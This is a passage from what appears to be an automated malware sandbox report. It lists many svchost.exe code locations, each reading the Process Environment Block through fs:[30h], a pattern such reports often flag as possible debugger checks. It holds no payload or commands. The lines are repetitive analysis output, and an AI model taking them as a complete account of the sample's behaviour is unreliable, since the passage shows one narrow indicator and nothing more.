          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EC3CD mov eax, dword ptr fs:[00000030h]2_2_038EC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B63C0 mov eax, dword ptr fs:[00000030h]2_2_038B63C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]2_2_038DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]2_2_038DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov ecx, dword ptr fs:[00000030h]2_2_038DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]2_2_038DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]2_2_038D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]2_2_038D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]2_2_0384E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]2_2_0384E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]2_2_0384E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038663FF mov eax, dword ptr fs:[00000030h]2_2_038663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]2_2_0386A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]2_2_0386A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]2_2_0386A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C310 mov ecx, dword ptr fs:[00000030h]2_2_0382C310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850310 mov ecx, dword ptr fs:[00000030h]2_2_03850310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov ecx, dword ptr fs:[00000030h]2_2_038B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA352 mov eax, dword ptr fs:[00000030h]2_2_038FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D8350 mov ecx, dword ptr fs:[00000030h]2_2_038D8350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D437C mov eax, dword ptr fs:[00000030h]2_2_038D437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]2_2_0386E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]2_2_0386E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402A0 mov eax, dword ptr fs:[00000030h]2_2_038402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402A0 mov eax, dword ptr fs:[00000030h]2_2_038402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov ecx, dword ptr fs:[00000030h]2_2_038C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382823B mov eax, dword ptr fs:[00000030h]2_2_0382823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B8243 mov eax, dword ptr fs:[00000030h]2_2_038B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B8243 mov ecx, dword ptr fs:[00000030h]2_2_038B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A250 mov eax, dword ptr fs:[00000030h]2_2_0382A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836259 mov eax, dword ptr fs:[00000030h]2_2_03836259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h]2_2_038EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h]2_2_038EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]2_2_03834260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]2_2_03834260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]2_2_03834260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382826B mov eax, dword ptr fs:[00000030h]2_2_0382826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03870185 mov eax, dword ptr fs:[00000030h]2_2_03870185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]2_2_038EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]2_2_038EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h]2_2_038D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h]2_2_038D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]2_2_0382A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]2_2_0382A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]2_2_0382A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]2_2_038F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]2_2_038F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_038AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039061E5 mov eax, dword ptr fs:[00000030h]2_2_039061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038601F8 mov eax, dword ptr fs:[00000030h]2_2_038601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov ecx, dword ptr fs:[00000030h]2_2_038DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]2_2_038DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]2_2_038DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]2_2_038DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F0115 mov eax, dword ptr fs:[00000030h]2_2_038F0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860124 mov eax, dword ptr fs:[00000030h]2_2_03860124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov ecx, dword ptr fs:[00000030h]2_2_038C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C156 mov eax, dword ptr fs:[00000030h]2_2_0382C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C8158 mov eax, dword ptr fs:[00000030h]2_2_038C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]2_2_03836154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]2_2_03836154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383208A mov eax, dword ptr fs:[00000030h]2_2_0383208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C80A8 mov eax, dword ptr fs:[00000030h]2_2_038C80A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F60B8 mov eax, dword ptr fs:[00000030h]2_2_038F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F60B8 mov ecx, dword ptr fs:[00000030h]2_2_038F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B20DE mov eax, dword ptr fs:[00000030h]2_2_038B20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0382A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038380E9 mov eax, dword ptr fs:[00000030h]2_2_038380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B60E0 mov eax, dword ptr fs:[00000030h]2_2_038B60E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C0F0 mov eax, dword ptr fs:[00000030h]2_2_0382C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038720F0 mov ecx, dword ptr fs:[00000030h]2_2_038720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B4000 mov ecx, dword ptr fs:[00000030h]2_2_038B4000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A020 mov eax, dword ptr fs:[00000030h]2_2_0382A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C020 mov eax, dword ptr fs:[00000030h]2_2_0382C020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6030 mov eax, dword ptr fs:[00000030h]2_2_038C6030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832050 mov eax, dword ptr fs:[00000030h]2_2_03832050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6050 mov eax, dword ptr fs:[00000030h]2_2_038B6050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385C073 mov eax, dword ptr fs:[00000030h]2_2_0385C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D678E mov eax, dword ptr fs:[00000030h]2_2_038D678E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038307AF mov eax, dword ptr fs:[00000030h]2_2_038307AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E47A0 mov eax, dword ptr fs:[00000030h]2_2_038E47A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383C7C0 mov eax, dword ptr fs:[00000030h]2_2_0383C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B07C3 mov eax, dword ptr fs:[00000030h]2_2_038B07C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]2_2_038527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]2_2_038527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]2_2_038527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE7E1 mov eax, dword ptr fs:[00000030h]2_2_038BE7E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]2_2_038347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]2_2_038347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C700 mov eax, dword ptr fs:[00000030h]2_2_0386C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830710 mov eax, dword ptr fs:[00000030h]2_2_03830710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860710 mov eax, dword ptr fs:[00000030h]2_2_03860710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]2_2_0386C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]2_2_0386C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]2_2_0386273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386273C mov ecx, dword ptr fs:[00000030h]2_2_0386273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]2_2_0386273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AC730 mov eax, dword ptr fs:[00000030h]2_2_038AC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386674D mov esi, dword ptr fs:[00000030h]2_2_0386674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]2_2_0386674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]2_2_0386674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830750 mov eax, dword ptr fs:[00000030h]2_2_03830750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE75D mov eax, dword ptr fs:[00000030h]2_2_038BE75D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]2_2_03872750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]2_2_03872750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B4755 mov eax, dword ptr fs:[00000030h]2_2_038B4755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838770 mov eax, dword ptr fs:[00000030h]2_2_03838770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]2_2_03834690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]2_2_03834690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C6A6 mov eax, dword ptr fs:[00000030h]2_2_0386C6A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038666B0 mov eax, dword ptr fs:[00000030h]2_2_038666B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0386A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A6C7 mov eax, dword ptr fs:[00000030h]2_2_0386A6C7
